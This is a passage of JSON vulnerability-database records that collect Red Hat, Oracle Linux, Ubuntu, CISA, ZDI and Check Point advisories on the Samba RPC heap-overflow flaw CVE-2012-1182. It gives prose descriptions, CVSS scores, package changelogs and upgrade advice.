"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-06-06T16:24:22", "id": "RHSA-2013:0515", "href": "https://access.redhat.com/errata/RHSA-2013:0515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:39:56", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n", "cvss3": {}, "published": "2013-02-21T00:00:00", "type": "redhat", "title": "(RHSA-2013:0506) Moderate: samba4 security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-06-06T16:24:36", "id": "RHSA-2013:0506", "href": "https://access.redhat.com/errata/RHSA-2013:0506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:45:10", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "redhat", "title": "(RHSA-2012:0478) Critical: samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2017-09-08T07:49:10", "id": "RHSA-2012:0478", "href": "https://access.redhat.com/errata/RHSA-2012:0478", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:37:39", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "redhat", "title": "(RHSA-2012:0465) Critical: samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-06-06T16:24:30", "id": "RHSA-2012:0465", "href": "https://access.redhat.com/errata/RHSA-2012:0465", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:45", "description": "[3.5.10-115]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804644", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "oraclelinux", "title": "samba security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "ELSA-2012-0465", "href": "http://linux.oracle.com/errata/ELSA-2012-0465.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:59", "description": "[4.0.0-55.rc4]\r\n- Fix dependencies of samba4-test package.\r\n- related: #896142\r\n \n[4.0.0-54.rc4]\r\n- Fix summary and description of dc subpackages.\r\n- resolves: #896142\r\n- Remove conflicting libsmbclient.7 manpage.\r\n- resolves: #896240\r\n \n[4.0.0-53.rc4]\r\n- Fix provides filter rules to remove conflicting libraries from samba4-libs.\r\n- resolves: #895718\r\n \n[4.0.0-52.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-51.rc4]\r\n- Make sure we use the same directory as samba package for the winbind pipe.\r\n- resolves: #886157\r\n \n[4.0.0-50.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-49.rc4]\r\n- Fix Netlogon AES encryption.\r\n- resolves: #885089\r\n \n[4.0.0-48.rc4]\r\n- Fix IPA trust AD lookup of users.\r\n- resolves: #878564\r\n \n[4.0.0-47.rc4]\r\n- Add require for krb5-libs >= 1.10 to samba4-libs.\r\n- resolves: #877533\r\n \n[4.0.0-46.rc4]\r\n- Rename /etc/sysconfig/samba4 to name to mach init scripts.\r\n- resolves: #877085\r\n \n[4.0.0-45.rc4]\r\n- Don't require samba4-common and samba4-test in samba4-devel package.\r\n- related: #871748\r\n \n[4.0.0-44.rc4]\r\n- Make libnetapi and internal library to fix dependencies.\r\n- resolves: #873491\r\n \n[4.0.0-43.rc4]\r\n- Move libnetapi and internal printing migration lib to libs package.\r\n- related: #766333\r\n \n[4.0.0-42.rc4]\r\n- Fix perl, pam and logrotate dependencies.\r\n- related: #766333\r\n \n[4.0.0-41.rc4]\r\n- Fix library dependencies found by rpmdiff.\r\n- Update winbind offline logon patch.\r\n- related: #766333\r\n \n[4.0.0-40.rc4]\r\n- Move libgpo to samba-common\r\n- resolves: #871748\r\n \n[4.0.0-39.rc4]\r\n- Rebase to version 4.0.0rc4.\r\n- related: #766333\r\n \n[4.0.0-38.rc3]\r\n- Add missing export KRB5CCNAME in init scripts.\r\n- resolves: #868419\r\n \n[4.0.0-37.rc3]\r\n- Move /var/log/samba to samba-common package for winbind which\r\n requires it.\r\n- resolves: #868248\r\n \n[4.0.0-36.rc3]\r\n- The standard auth modules need to be built into smbd to function.\r\n- resolves: #867854\r\n \n[4.0.0-35.rc3]\r\n- Move pam_winbind.conf to the package of the module.\r\n- resolves: #867317\r\n \n[4.0.0-34.rc3]\r\n- Built auth_builtin as static module.\r\n- related: #766333\r\n \n[4.0.0-33.rc3]\r\n- Add back the AES patches which didn't make it in rc3.\r\n- related: #766333\r\n \n[4.0.0-32.rc3]\r\n- Rebase to version 4.0.0rc3.\r\n- related: #766333\r\n \n[4.0.0-31.rc2]\r\n- Use alternatives to configure winbind_krb5_locator.so\r\n- resolves: #864889\r\n \n[4.0.0-30.rc2]\r\n- Fix multilib package installation.\r\n- resolves: #862047\r\n- Filter out libsmbclient and libwbclient provides.\r\n- resolves: #861892\r\n- Rebase to version 4.0.0rc2.\r\n- related: #766333\r\n \n[4.0.0-29.rc1]\r\n- Fix Requires and Conflicts.\r\n- related: #766333\r\n \n[4.0.0-28.rc1]\r\n- Move pam_winbind and wbinfo manpages to the right subpackage.\r\n- related: #766333\r\n \n[4.0.0-27.rc1]\r\n- Fix permission for init scripts.\r\n- Define a common KRB5CCNAME for smbd and winbind.\r\n- Set piddir back to /var/run in RHEL6.\r\n- related: #766333\r\n \n[4.0.0-26.rc1]\r\n- Add '-fno-strict-aliasing' to CFLAGS again.\r\n- related: #766333\r\n \n[4.0.0-25.rc1]\r\n- Build with syste libldb package which has been just added.\r\n- related: #766333\r\n \n[4.0.0-24.rc1]\r\n- Rebase to version 4.0.0rc1.\r\n- resolves: #766333", "cvss3": {}, "published": "2013-02-27T00:00:00", "type": "oraclelinux", "title": "samba4 security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2013-02-27T00:00:00", "id": "ELSA-2013-0506", "href": "http://linux.oracle.com/errata/ELSA-2013-0506.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "description": "evolution-mapi\r\n[0.28.3-12]\r\n- Add patch for RH bug #903241 (Double-free on message copy/move)\r\n \n[0.28.3-11]\r\n- Add patch for RH bug #902932 (Cannot connect with latest samba)\r\n \n[0.28.3-10]\r\n- Drop multilib by obsoleting evolution-mapi < 0.28.3-9 (RH bug #886914).\r\n \n[0.28.3-9]\r\n- Adapt to OpenChange 1.0 (RH bug #767678).\r\n \n[0.28.3-8]\r\n- Add patch for RH bug #680061 (crash while setting props).\r\n \nopenchange\r\n[1.0-4]\r\n- Use current version (1.0-4) for a multilib obsolete (RH bug #881698).\r\n \n[1.0-3]\r\n- Add patch to be able to send large messages (RH bug #870405)\r\n \n[1.0-2]\r\n- Drop multilib by obsoleting openchange < 0.9 (RH bug #881698).\r\n \n[1.0-1]\r\n- Rebase to 1.0 using the rpm spec from Fedora 18.", "cvss3": {}, "published": "2013-02-27T00:00:00", "type": "oraclelinux", "title": "openchange security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2013-02-27T00:00:00", "id": "ELSA-2013-0515", "href": "http://linux.oracle.com/errata/ELSA-2013-0515.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "description": "[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "oraclelinux", "title": "samba security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-16T00:00:00", "id": "ELSA-2012-0478", "href": "http://linux.oracle.com/errata/ELSA-2012-0478.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:48", "description": "[3.5.10-0.108]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804650", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "oraclelinux", "title": "samba3x security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "ELSA-2012-0466", "href": "http://linux.oracle.com/errata/ELSA-2012-0466.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:55:37", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and\n3.6.x before 3.6.4 does not implement validation of an array length in a\nmanner consistent with validation of array memory allocation, which allows\nremote attackers to execute arbitrary code via a crafted RPC call.\n\n#### Bugs\n\n * <https://bugzilla.samba.org/show_bug.cgi?id=8815>\n * <https://bugs.launchpad.net/bugs/978458>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | in hardy, the 3.0 reproducer leads to a glibc backtrace\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "ubuntucve", "title": "CVE-2012-1182", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "UB:CVE-2012-1182", "href": "https://ubuntu.com/security/CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:08:38", "description": "Samba has released an update to address a vulnerability in Samba versions 3.6.3 and all previous versions. Exploitation of this vulnerability may allow a remote attacker to use anonymous connections to execute arbitrary code with root privileges. \n \nUS-CERT encourages users and administrators to review the recent [Samba Security Announcement](<https://www.samba.org/samba/security/CVE-2012-1182>) and apply any necessary updates to help mitigate the risk. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2012/04/11/Samba-Releases-Updates-30x-363>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "cisa", "title": "Samba Releases Updates for 3.0.x - 3.6.3 ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-10-23T00:00:00", "id": "CISA:C73BC9C5DAF991808EA4A267072DA584", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/04/11/Samba-Releases-Updates-30x-363", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T20:53:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL LSA TrustDomainInfoControllers request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba NDR PULL LSA TrustDomainInfoControllers Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-062", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS EnumArray1 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba NDR PULL DFS EnumArray1 Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-064", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL SVCCTL StartServiceW request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba NDR PULL SVCCTL StartServiceW Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-063", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:01", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ndr_ValidatePassword requests. When parsing the data send in the request Samba uses the field 'pwd_history' to create a heap allocation but then uses another field, 'pwd_history_len', to write data to the allocation. Because there is no check to see if 'pwd_history_len' is smaller than 'pwd_history' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba ndr_ValidatePassword heap overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-071", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-071/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ReportEventW requests. When parsing the data send in the request Samba uses the field 'strings' to create a heap allocation but then uses another field, 'num_of_strings', to write data to the allocation. Because there is no check to see if 'num_of_strings' is smaller than 'strings' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba ReportEventW Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-072", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles GetAliasMembership requests. When parsing the data send in the request Samba uses the field 'sids' to create a heap allocation but then uses another field, 'num_sids', to write data to the allocation. Because there is no check to see if 'num_sids' is smaller than 'sids' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba GetAliasMembership SidArray Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-068", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-068/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:00", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles lsa_LookupNames requests. When parsing the data send in the request Samba uses the field 'names' to create a heap allocation but then uses another field, 'num_names', to write data to the allocation. Because there is no check to see if 'num_names' is smaller than 'names' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba lsa_LookupNames Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-070", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-070/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:07", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS INFO3 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba ndr_pull_dfs_Info3 Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-061", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-061/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles SetInfoPolicy requests. When parsing the data send in the request Samba uses the field 'settings' to create a heap allocation but then uses another field, 'count', to write data to the allocation. Because there is no check to see if 'count' is smaller than 'settings' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba SetInfoPolicy AuditEventsInfo Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-069", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-069/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:16:53", "description": "A heap overflow vulnerability has been reported in Samba daemon. The vulnerability is due to an error on the PIDL auto-generated code in the LSA RPC service of the Samba daemon. Remote attackers could exploit this vulnerability by making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation that allows to trigger a heap overflow. A successful exploitation of this vulnerability could execute arbitrary code with root privileges.", "cvss3": {}, "published": "2013-07-28T00:00:00", "type": "checkpoint_advisories", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow (CVE-2012-1182)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 